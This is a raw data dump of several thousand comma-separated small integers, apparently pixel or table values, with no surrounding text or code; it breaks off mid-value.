6,48,64,80,96,116,116,124,132,128,120,104,88,68,48,32,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,28,36,48,64,84,104,124,124,132,140,136,128,108,88,68,48,32,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,28,36,48,60,76,92,112,112,120,128,124,120,104,88,68,48,32,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,32,40,48,56,68,80,96,92,96,104,104,104,92,80,64,48,32,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,32,40,48,56,64,72,84,76,76,80,80,80,72,64,52,40,28,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,32,40,52,60,68,76,84,72,68,68,60,60,52,44,36,28,20,12,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,36,48
,64,72,80,88,96,84,72,64,52,52,44,36,28,20,16,12,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,44,56,72,80,88,96,100,80,60,52,44,48,40,32,28,24,24,20,12,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,48,60,76,80,84,88,88,64,44,40,36,48,44,40,40,40,36,28,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,48,56,68,68,68,68,68,48,32,32,36,56,56,56,56,52,44,36,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,48,52,60,60,60,60,64,48,32,36,48,72,72,72,68,60,52,44,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,48,56,68,72,76,80,88,72,56,56,68,92,88,84,76,68,60,52,28,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,48,60,76,84,92,100,108,96,76,72,84,108,100,92,84,76,68,60,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,48,64,80,92,100,108,116,104,84,76,92,112,104,96,88,80,72,64,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,44,56,68,80,88,96,104,92,76,72,88,104,96,88,80,72,64,56,28,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,36,48,60,72,80,88,96,88,76,68,80,92,84,76,68,60,52,48,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,28,40,52,64,72,80,88,84,72,60,68,76,68,60,52,44,40,40,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,24,36,48,60,68,76,84,80,64,52,56,64,56,48,40,36,36,36,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,20,32,44,56,64,72,76,72,56,44,44,52,44,36,32,32,32,32,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,20,32,44,56,64,72,76,76,64,56,56,64,56,48,44,40,36,32,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,24,36,48,60,68,76,84,84,76,72,72,80,72,64,56,48,40,32,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,24,32,40,48,56,64,72,72,64,64,68,80,72,64,56,48,40,32,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,24,32,40,48,56,64,72,72,64,64,68,84,76,68,60,52,44,36,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,24,32,40,48,56,64,72,72,64,64,68,84,76,68,60,52,44,36,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,24,32,40,48,56,64,72,72,64,64,68,84,76,68,60,52,44,36,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,20,28,36,44,52,60,68,68,64,64,68,80,72,64,56,48,40,32,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,16,24,32,40,48,56,64,64,64,64,68,76,68,60,52,44,36,28,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,8,12,16,20,24,28,32,32,32,32,36,44,40,36,32,28,24,20,12,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,8,8,8,12,20,20,20,16,12,12,12,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,8,12,16,16,20,28,36,36,32,32,36,40,40,32,24,20,20,16,8,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,12,20,28,36,40,48,56,60,60,56,56,56,60,60,56,48,40,36,28,20,12,4,0,0,0,0,0,0,0,0,0,0,0,0,4,12,20,32,44,56,64,72,76,76,76,72,72,72,76,76,76,72,64,56,44,32,20,12,4,0,0,0,0,0,0,0,0,0,0,0,8,16,24,36,48,60,68,76,76,76,76,72,72,72,76,76,76,76,68,60,48,36,24,16,8,0,0,0,0,0,0,0,0,0,0,0,8,16,24,36,48,60,68,76,76,76,76,72,72,72,76,76,76,76,68,60,48,36,24,16,8,0,0,0,0,0,0,0,0,0,0,0,8,20,28,40,52,64,72,80,80,76,76,72,72,76,80,80,80,80,72,64,52,36,24,16,8,0,0,0,0,0,0,0,0,0,0,0,8,24,32,44,56,68,76,84,84,76,76,72,72,80,84,84,84,84,76,68,56,36,24,16,8,0,0,0,0,0,0,0,0,0,0,0,8,28,40,56,72,88,100,112,112,100,100,96,96,104,104,100,100,100,88,76,60,36,24,16,8,0,0,0,0,0,0,0,0,0,0,0,8,32,44,60,76,92,108,120,120,104,104,104,104,112,104,96,96,96,84,68,52,28,20,16,8,0,0,0,0,0,0,0,0,0,0,0,8,32,44,60,76,92,108,120,124,112,112,112,112,120,108,96,88,84,72,56,40,16,12,12,8,0,0,0,0,0,0,0,0,0,0,0,4,28,40,52,64,76,88,104,112,100,100,100,100,112,100,84,72,64,52,40,28,4,4,4,4,0,0,0,0,0,0,0,0,0,0,0,0,28,40,52,64,76,88,108,120,104,104,104,104,120,108,88,76,64,52,40,28,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,48,60,72,84,100,124,136,116,112,112,112,128,112,88,76,64,52,40,28,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,52,68,84,100,120,148,160,140,132,128,124,132,112,84,72,60,48,36,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,56,76,96,116,140,172,184,164,152,144,136,136,112,80,68,56,44,32,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,28,52,72,92,112,136,164,172,152,136,124,112,108,84,56,48,40,32,24,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,44,60,76,92,112,136,140,120,104,92,80,76,56,32,28,24,20,16,12,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,36,48,60,72,88,108,108,88,72,60,48,44,28,8,8,8,8,8,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,32,44,56,68,84,100,100,84,68,56,44,36,20,4,4,4,4,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,32,44,56,68,84,96,96,84,64,52,40,32,16,4,4,4,4,4,4,0
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,32,48,64,80,96,108,112,104,88,76,64,56,40,28,24,20,16,12,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,32,48,64,80,96,108,116,112,100,92,84,80,64,52,44,36,28,20,12,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,32,48,64,80,96,108,120,120,112,108,104,104,88,76,64,52,40,28,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,28,40,52,64,76,88,100,100,96,96,96,104,92,80,68,56,44,32,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,28,40,52,64,76,88,100,100,96,96,96,104,92,80,68,56,44,32,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,28,40,52,64,76,88,100,100,96,96,96,104,92,80,68,56,44,32,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,28,40,52,68\n,80,92,104,104,100,100,100,108,96,84,72,60,48,36,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,24,36,48,68,84,96,108,108,108,108,112,116,100,88,76,64,52,40,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,16,24,32,52,68,80,88,88,88,92,100,104,88,76,68,60,52,40,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,8,12,16,36,52,64,72,72,76,84,92,96,80,68,60,56,48,36,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,36,48,56,60,68,76,84,84,68,56,48,44,36,28,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,36,52,64,72,84,92,100,96,80,64,52,44,32,24,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,44,64,80,92,108,120,132,128,108,88,72,60,44,32,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,28,52,76,92,104,124,140,156,152,128,104,88,76,56,40,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,28,56,80,96,108,128,148,168,164,136,112,96,84,64,44,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,28,52,76,92,104,124,144,164,160,136,112,96,84,64,44,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,44,64,80,92,112,128,144,144,124,104,88,76,56,40,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,36,56,72,88,108,124,140,140,124,104,88,72,52,36,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,32,52,68,84,104,124,144,148,132,112,96,80,60,40,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,40,56,72,84,100,124,148,152,132,116,100,88,72,48,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,36,48,64,72,84,104,128,132,116,104,88,80,68,48,24,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,20,36,44,64,72,80,96,120,124,108,100,80,72,64,48,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,36,48,72,80,88,100,124,128,112,100,76,68,60,48,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,40,56,84,92,100,116,140,140,120,104,76,68,60,44,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,44,64,96,104,116,136,160,156,132,112,80,72,60,40,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,44,60,88,92,100,116,140,136,112,96,68,64,56,40,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,4,4,4,24,44,56,80,76,80,92,112,112,92,80,56,56,52,40,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,12,16,20,24,44,64,80,100,96,100,108,124,124,104,88,64,60,52,40,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,20,28,36,44,64,88,108,124,120,124,132,144,144,120,100,76,68,56,40,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,28,40,52,64,84,108,132,144,140,144,152,160,160,136,112,88,76,60,40,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,28,40,52,64,80,100,120,128,124,128,136,140,144,124,104,84,72,56,36,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,28,40,52,64,76,92,108,112,108,112,116,116,128,112,96,80,68,52,36,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,28,40,52,64,80,96,108,108,104,104,104,108,120,104,92,80,68,56,44,28,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,36,48,60,72,92,112,128,128,124,128,132,140,152,132,116,100,84,68,52,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,40,52,64,76,100,124,144,144,144,152,160,172,180,156,136,116,96,76,56,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,32,40,48,56,76,96,112,112,112,120,128,140,152,132,116,100,84,68,52,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,24,28,32,36,52,68,80,80,80,88,96,108,124,108,96,84,72,60,48,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,16,16,16,16,32,48,56,56,56,64,72,88,104,88,80,72,64,56,48,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,16,16,16,16,36,56,64,64,64,72,84,104,116,96,88,80,72,64,52,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,16,16,16,16,40,60,68,68,68,80,96,120,128,108,100,92,84,72,56,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,16,16,16,16,40,56,64,68,72,88,108,128,136,120,112,100,88,72,52,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,8,8,8,8,32,44,52,60,68,84,100,116,1
24,112,104,92,80,64,48,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,36,44,56,64,76,88,100,108,96,88,76,68,56,44,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,28,44,56,68,76,88,100,112,116,100,88,76,68,56,44,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,52,64,76,84,96,112,128,128,108,96,84,76,64,48,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,28,44,56,68,80,92,108,120,120,104,92,80,68,56,40,28,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,36,52,68,84,100,112,120,120,108,92,76,60,44,32,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,36,56,76,96,112,120,124,124,108,88,68,48,32,24,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,40,60,76,96,112,116,120,116,96,76,60,40,24,20,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,8,28,48,64,76,96,112,112,112,104,84,68,56,36,20,16,12,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,12,20,36,52,64,72,96,112,108,104,96,80,68,60,36,16,12,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,12,24,36,52,68,80,92,116,132,128,124,116,100,88,76,48,24,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,20,36,52,68,84,100,116,140,156,148,140,132,116,100,84,52,24,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,20,36,52,68,84,100,116,140,160,152,144,136,120,104,88,56,24,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,20,36,52,68,84,96,108,132,152,144,136,128,112,100,88,56,24,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,20,36,52,72,84,92,100,120,136,128,120,108,96,88,80,52,24,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,20,36,56,76,84,92,100,116,128,120,108,96,88,80,72,48,24,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,20,36,56,76,88,100,112,128,140,136,128,120,108,96,84,60,36,24,12,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,20,36,56,80,96,112,128,144,156,156,152,144,128,112,96,72,48,32,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,12,24,40,64,76,88,100,116,128,128,128,120,108,96,84,64,44,32,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,12,24,48,56,64,72,88,100,100,104,96,88,80,72,56,40,32,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,12,24,48,56,64,72,84,92,92,96,88,80,72,64,52,40,32,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,12,24,48,56,64,72,80,84,84,88,80,72,64,56,48,40
,32,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,16,28,48,56,64,72,80,80,80,84,84,76,68,60,52,44,36,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,20,28,44,52,60,68,76,72,72,80,88,80,72,64,56,48,40,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,20,28,36,52,60,68,76,80,72,72,80,88,80,72,64,56,48,40,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,24,32,40,56,64,72,80,80,72,72,80,88,80,72,64,56,48,40,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,24,32,40,52,60,68,76,76,68,68,76,88,80,72,64,56,48,40,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,24,32,40,48,56,64,72,72,64,64,68,84,76,68,60,52,44,36,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,24,32,40,48,56,64,72,72,64,64,68,84,76,68,60,52,44,36,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,24,32,40,48,56,64,72,72,64,64,68,84,76,68,60,52,44,36,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,20,28,36,48,60,72,84,88,84,84,88,96,84,72,60,48,40,32,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,16,28,40,56,72,88,104,112,116,116,116,116,100,84,68,52,40,28,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,12,24,36,52,68,84,100,112,116,116,116,112,96,80,64,48,36,24,12,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,12,24,32,44,56,68,80,88,88,88,92,92,80,68,56,44,36,24,12,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,20,32,40,52,64,76,88,92,88,88,88,88,76,64,52,40,32,20,12,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,24,36,44,56,68,80,92,92,88,88,92,92,80,68,56,44,36,24,12,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,32,48,56,68,80,92,104,100,92,92,100,104,92,80,68,56,48,32,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,36,56,68,84,100,116,132,132,124,124,132,132,116,100,84,68,56,36,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,36,60,76,92,108,124,140,140,136,136,140,140,124,108,92,76,60,36,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,36,56,68,84,100,116,132,132,124,124,132,132,116,100,84,68,56,36,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,32,48,56,72,84,96,108,104,96,96,104,108,96,84,72,60,52,36,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,24,36,44,64,80,96,112,116,116,120,128,128,112,96,80,64,52,36,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,16,28,36,60,80,100,120,132,140,148,160,156,136,116,96,76,60,40,20,0,0,0,0,0
,0,0,0,0,0,0,0,0,0,0,0,4,12,24,32,60,84,108,132,152,164,176,188,180,156,132,108,84,64,40,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,12,20,52,80,104,128,152,168,180,188,176,148,124,100,76,56,36,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,8,40,68,88,108,128,144,156,164,156,128,108,88,68,52,36,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,60,80,96,112,124,136,152,148,120,100,84,68,56,44,28,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,60,80,96,112,128,144,164,164,136,116,100,84,68,52,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,28,60,84,104,124,144,164,188,192,160,136,116,96,76,56,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,52,72,88,104,120,136,156,164,136,116,100,88,72,56,36,4,4,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,44,60,72,84,96,108,124,132,108,92,80,76,64,52,36,8,8,8,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,36,48\n,56,64,72,80,92,100,80,68,60,64,56,48,36,12,12,12,12,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,28,40,48,56,64,72,84,92,76,64,56,64,56,48,36,16,16,16,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,20,32,40,48,56,64,76,84,72,60,52,64,56,48,36,20,20,20,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,12,20,28,36,44,52,60,68,60,52,44,60,52,44,36,24,24,24,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,8,12,16,20,24,28,36,32,28,24,48,44,40,36,28,28,28,28,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,4,4,4,36,36,36,36,32,32,32,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,32,32,32,32,32,32,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,32,32,32,32,32,32,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,32,32,32,32,32,32,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,4,4,4,4,4,4,4,4,4,4,4,36,36,36,36,32,32,32,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,12,16,20,24,28,32,36,36,32,28,24,48,44,40,36,28,28,28,28,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,20,28,36,44,52,60,68,68,60,52,44,60,52,44,36,24,24,24,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,28,40,52,64,76,88,100,100,88,76,64,72,60,48,36,20,20,20,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,36,48,60,72,84,96,108,108,92,80,68,72,60,48,36,16,16,16,16
,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,44,56,68,80,92,104,116,116,96,84,72,72,60,48,36,12,12,12,12,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,28,52,68,80,92,104,116,132,132,108,92,80,76,64,52,36,8,8,8,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,60,80,96,112,128,144,164,164,136,116,100,88,72,56,36,4,4,4,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,28,60,84,104,124,144,164,188,192,160,136,116,96,76,56,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,52,72,88,104,120,136,156,164,136,116,100,84,68,52,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,52,72,88,104,116,128,144,148,120,100,84,68,56,44,28,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,8,32,60,80,96,112,124,132,140,140,112,92,76,60,48,36,24,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,12,20,44,72,96,116,136,148,156,164,160,132,108,88,68,52,36,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,12,24,32,52,76,100,120,136,144,152,164,164,140,116,96,76,60,40,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,20,32,40,56,76,96,116,128,132,140,148,152,132,112,92,72,56,36,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,24,36,44,56,72,88,104,108,108,112,120,128,112,96,80,64,52,36,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,32,48,56,68,80,92,104,100,92,92,100,108,96,84,72,60,52,36,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,36,56,68,84,100,116,132,132,124,124,132,132,116,100,84,68,56,36,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,36,60,76,92,108,124,140,140,136,136,140,140,124,108,92,76,60,36,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,36,56,68,84,100,116,132,132,124,124,132,132,116,100,84,68,56,36,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,32,52,60,72,84,96,108,104,96,92,100,104,92,80,68,56,48,32,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,32,52,60,72,84,96,108,104,96,88,92,92,80,68,56,44,36,24,12,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,32,52,60,72,84,96,108,104,96,88,92,88,76,64,52,40,32,20,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,36,56,64,76,88,100,112,108,96,88,88,84,72,60,48,36,28,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,36,52,60,72,84,96,108,104,96,92,92,88,76,64,52,40,28,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,40,52,56,64,72,84,96,88,80,80,84,84,76
,64,52,40,28,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,48,56,60,68,76,88,100,88,72,72,76,76,68,56,44,32,24,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,28,56,68,76,84,92,100,108,88,68,64,64,64,56,48,40,32,24,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,64,76,88,96,104,112,120,96,72,68,64,64,56,48,40,32,24,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,60,68,80,88,96,104,112,88,68,68,64,64,56,48,40,36,28,20,12,4,4,4,4,0,0,0,0,0,0,0,0,0,0,0,0,28,52,60,72,80,88,96,104,84,68,68,64,64,56,48,40,40,32,24,16,8,8,8,8,0,0,0,0,0,0,0,0,0,0,0,0,24,44,52,64,72,80,88,96,80,68,68,64,60,52,44,36,40,32,24,16,12,12,12,12,0,0,0,0,0,0,0,0,0,0,0,0,20,36,44,56,64,72,80,88,76,64,60,52,44,36,28,20,28,24,20,16,16,16,16,16,0,0,0,0,0,0,0,0,0,0,0,0,16,28,36,48,56,64,68,72,60,48,40,28,20,12,8,4,20,20,20,20,20,20,20,20,0,0,0,0,0,0,0,0,0,0,0,0,12,20,28,36,40,44,44,44,32,24,16,8,4,0,0,0,24,24,24,24,24,24,24,24,0,0,0,0,0,0,0,0,0,0,0,0,8,12,16,20,20,20,20,20,12,8,4,0,0,0,0,0,28,28,28,28,28,28,28,28,0,0,0,0,0,0,0,0,0,0,0,0,4,4,4,4,4,4,4,4,0,0,0,0,0,0,0,0,32,32,32,32,32,32,32,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,32,32,32,32,32,32,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,32,32,32,32,32,32,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,32,32,32,32,32,32,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,32,32,32,32,32,32,32,32,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,8,8,8,8,8,8,8,8,8,8,8,8,36,36,36,32,28,28,28,28,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,12,20,20,20,20,20,20,16,16,16,16,16,16,40,40,40,32,24,24,24,24,0,0,0,0,0,0,0,0,0,0,0,0,4,8,16,28,40,40,40,40,36,32,24,24,24,24,24,24,44,44,44,32,20,20,20,20,0,0,0,0,0,0,0,0,0,0,0,0,8,16,24,40,56,60,60,60,52,44,36,32,32,28,28,28,44,44,44,32,16,16,16,16,0,0,0,0,0,0,0,0,0,0,0,0,12,24,32,52,72,80,80,80,68,56,48,44,44,36,36,36,48,48,48,32,12,12,12,12,0,0,0,0,0,0,0,0,0,0,0,0,16,32,40,60,84,96,100,104,88,72,68,68,64,52,48,44,52,52,48,28,8,8,8,8,0,0,0,0,0,0,0,0,0,0,0,0,20,40,48,68,92,108,116,124,108,92,92,96,92,76,68,60,60,56,48,24,4,4
,4,4,0,0,0,0,0,0,0,0,0,0,0,0,24,44,52,72,96,112,124,136,120,108,108,112,108,92,80,68,60,52,44,20,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,44,52,68,88,104,116,128,112,100,100,104,100,84,72,60,52,44,36,16,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,24,44,48,60,76,92,104,120,108,100,104,108,104,88,76,60,48,36,28,12,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,20,36,36,44,56,72,88,108,104,104,112,116,112,96,80,60,44,28,20,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,16,28,28,32,44,60,80,100,104,112,120,128,120,104,84,64,44,24,16,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,12,20,20,24,36,52,72,92,104,120,128,132,120,104,84,64,40,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,12,16,24,36,48,64,80,100,124,124,120,108,96,80,64,36,8,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,8,16,28,40,48,60,72,96,120,112,100,88,80,68,56,28,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,4,12,24,40,56,68,80,92,116,136,128,116,104,92,80,68,40,12,8,4,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,20,36,56,76,92,108,124,148,168,160,148,136,120,104,88,56,24,16,8,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,8,20,36,56,76,92,10